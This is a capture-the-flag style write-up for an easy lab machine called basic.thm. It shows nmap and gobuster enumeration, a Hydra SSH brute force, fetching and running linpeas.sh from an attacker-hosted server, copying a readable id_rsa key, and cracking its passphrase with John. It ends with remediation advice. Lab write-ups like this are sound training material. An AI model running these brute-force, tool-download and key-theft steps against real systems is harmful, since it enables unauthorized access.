Target IP: basic.thm (Requires /etc/hosts entry)
Difficulty: Easy
Objective: Compromise the machine and retrieve the flag from the user kay.
1. Executive Summary
This assessment targets a Linux machine hosting a web application and SSH service. Initial access is achieved by enumerating valid usernames via SMB (or web context) and performing a dictionary attack (Brute Force) on the SSH service to compromise the user jan. Lateral movement to the user kay is achieved by discovering an unprotected SSH private key (id_rsa) during local enumeration. The key’s passphrase is cracked offline, granting access to kay. The final objective is reached by recovering a password from a backup file (pass.bak).
Key TTPs (MITRE ATT&CK):
- T1110 (Brute Force): Hydra attack against SSH credentials.
- T1082 (System Information Discovery): Using enumeration scripts (LinPEAS/LinEnum).
- T1552 (Unsecured Credentials): Finding private keys in local directories.
- T1110 (Brute Force): Cracking the SSH key passphrase offline.
2. Operational Setup
OpSec Note: Always organize your workspace.
Host Configuration
# Add to hosts file
echo "10.10.x.x basic.thm" | sudo tee -a /etc/hostsWorkspace (Tmux)
- Pane 1 (Recon):
nmap,gobuster. - Pane 2 (Brute Force):
hydra,john. - Pane 3 (Access): SSH sessions.
3. Enumeration & Initial Access
A. Network Scanning
We start with Nmap to define the attack surface.
nmap -sC -sV -oA nmap/basic basic.thmResults:
- 22/tcp (SSH): OpenSSH 7.2p2 (Ubuntu).
- 80/tcp (HTTP): Apache 2.4.18.
- 139/445 (SMB): Samba (Optional but good for checking user lists).
B. Web Enumeration
A quick check of the web server for hidden directories.
gobuster dir -u http://basic.thm -w /usr/share/wordlists/dirb/common.txtFindings:
/development-> This often contains notes mentioning names like “J” (Jan) or “K” (Kay).
C. Brute Forcing SSH (The Entry)
Based on your notes, you found the user jan and the password armando. Since there was no direct RCE on the web app, this was likely a Brute Force attack.
Command:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://basic.thmResult:
- User:
jan - Password:
armando
Login:
ssh jan@basic.thm
# Password: armando4. Local Enumeration (The “Script” Part)
Once inside as jan, we need to see what else is on the box. You mentioned wgeting a script. This is typically LinPEAS or LinEnum.
A. Transferring Tools
Since the target has internet access (or you hosted it locally):
On Attacker Machine:
python3 -m http.server 80On Target (jan session):
cd /tmp
wget http://10.10.YOUR.IP/linpeas.sh
chmod +x linpeas.sh
./linpeas.shB. Analyzing Output
The script spits out a lot of data. We filter for “Interesting Files” or “Users”.
- User Found:
kay(Root is present, but Kay is our target). - Critical Finding: Inside
/home/kay/.ssh, there is anid_rsafile. - Vulnerability: The file permissions are readable by others (or
janis in a group that can read it).
Action: Copy the key content.
cat /home/kay/.ssh/id_rsa(Copy this block to your local machine as kay_id_rsa).
5. Lateral Movement: Cracking the Key
A. The “MD5 Sum??” Confusion
You mentioned “md5 sum” and “johnny dai”. Here is what technically happened:
The id_rsa key you found was encrypted with a passphrase. You cannot use it to SSH until you unlock it. SSH keys are not MD5, but we use a tool to convert the key into a hash format that John the Ripper can understand.
B. Converting the Key (ssh2john)
/usr/share/john/ssh2john.py kay_id_rsa > key.hashC. Cracking the Passphrase (john)
Now we use John against the hash file.
john --wordlist=/usr/share/wordlists/rockyou.txt key.hashResult:
beeswax
D. Logging in as Kay
Now we have the key and the passphrase.
# Set correct permission first (crucial for SSH keys)
chmod 600 kay_id_rsa
# Login
ssh -i kay_id_rsa kay@basic.thm
# Enter passphrase: beeswax6. Final Loot (pass.bak)
We are now logged in as kay.
We list the files in the home directory.
ls -laFile Found: pass.bak
Read the File:
cat pass.bakResult: This file contains the final password/flag for the room.
7. Remediation (Blue Team)
- Weak Passwords:
- The user
janhad a weak password (armando) vulnerable to dictionary attacks. Enforce strong password policies.
- File Permissions:
- The user
kay’s private key (id_rsa) was readable by other users. SSH keys should always be600(Read/Write by owner only). chmod 600 /home/kay/.ssh/id_rsa.
- SSH Key Passphrases:
- The passphrase
beeswaxis extremely weak. If using keys, ensure passphrases are complex.